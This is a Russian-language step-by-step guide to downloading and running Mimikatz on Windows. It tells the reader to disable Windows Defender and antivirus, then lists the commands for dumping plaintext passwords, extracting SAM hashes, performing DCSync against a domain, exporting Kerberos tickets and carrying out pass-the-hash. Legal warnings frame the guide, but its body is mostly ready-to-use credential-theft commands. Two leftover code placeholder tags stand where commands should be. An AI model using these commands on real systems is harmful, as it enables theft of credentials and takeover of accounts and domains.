Введение

Mimikatz – это мощный инструмент, предназначенный для извлечения паролей, хэшей, PIN-кодов и билетов Kerberos из памяти в открытом виде. Он широко используется специалистами по тестированию на проникновение и профессионалами по безопасности для оценки уязвимости систем. В этом руководстве представлен пошаговый подход к установке и использованию Mimikatz для этического тестирования безопасности.

Предупреждение: Несанкционированное использование Mimikatz является незаконным. Убедитесь, что у вас есть четкое разрешение, прежде чем использовать его в любой среде.

Предварительные условия

Перед установкой Mimikatz убедитесь, что у вас есть все необходимое:

  • Машина с ОС Windows (Windows 7, 10, 11 или Server)

  • Привилегии администратора

  • Защитник Windows и любое антивирусное программное обеспечение отключены (Mimikatz часто отмечается как вредоносное ПО)

Загрузка Mimikatz

Mimikatz – это инструмент с открытым исходным кодом, доступный на GitHub. Чтобы загрузить его:

  1. Откройте веб-браузер и перейдите по адресу
    https://github.com/gentilkiwi/mimikatz

  2. Нажмите Code > Download ZIP.

  3. Распакуйте ZIP-файл в выбранную вами директорию.

Вы также можете клонировать репозиторий с помощью Git:

git clone https://github.com/gentilkiwi/mimikatz.git

Запуск Mimikatz

Поскольку для запуска Mimikatz требуются права администратора, выполните следующие действия:

  1. Откройте Command Prompt или PowerShell от имени администратора.

  2. Перейдите в папку, из которой вы извлекли Mimikatz:

    ###ATP_NOTR_2_CODE_TAG_NOTR_ATP##

  3. Запустите Mimikatz:

    mimikatz.exe

Теперь вы должны увидеть интерфейс командной строки с подсказкой:
mimikatz #

Основные команды Mimikatz

1. Проверка системных привилегий

Перед извлечением учетных данных убедитесь, что вы обладаете достаточными привилегиями:

privilege::debug

В случае успеха вы должны увидеть:
Привилегия ’20’ OK

Извлечение паролей из памяти

Чтобы извлечь пароли, хранящиеся в памяти, используйте:

sekurlsa::logonpasswords

Это выведет имена пользователей, домены и пароли в открытом виде, если они доступны.

Выгрузка NTLM-хэшей

Хэши NTLM могут использоваться для атак типа “передай хэш”. Чтобы извлечь их:

lsadump::sam

Или для удаленных систем:

lsadump::dcsync /domain:targetdomain.com /user:Administrator

Выгрузка билетов Kerberos

Чтобы извлечь билеты Kerberos из системы:

sekurlsa::tickets /export

Это экспортирует файлы ###ATP_NOTR_10_CODE_TAG_NOTR_ATP##, которые могут быть использованы в атаках типа pass-the-ticket.

Атака с передачей хэша

Для аутентификации с использованием NTLM-хэша вместо пароля:

sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<hash>

Заключение

Mimikatz остается одним из самых мощных инструментов для оценки безопасности Windows-систем благодаря своей способности извлекать пароли, хэши и билеты Kerberos непосредственно из памяти. При ответственном и этичном использовании он помогает специалистам выявлять уязвимости, проверять конфигурации доменной инфраструктуры и повышать общий уровень безопасности организации. Однако важно помнить, что такие инструменты, как Mimikatz, должны использоваться только с официального разрешения и в контролируемой среде, поскольку несанкционированное использование нарушает закон и может привести к серьезным последствиям.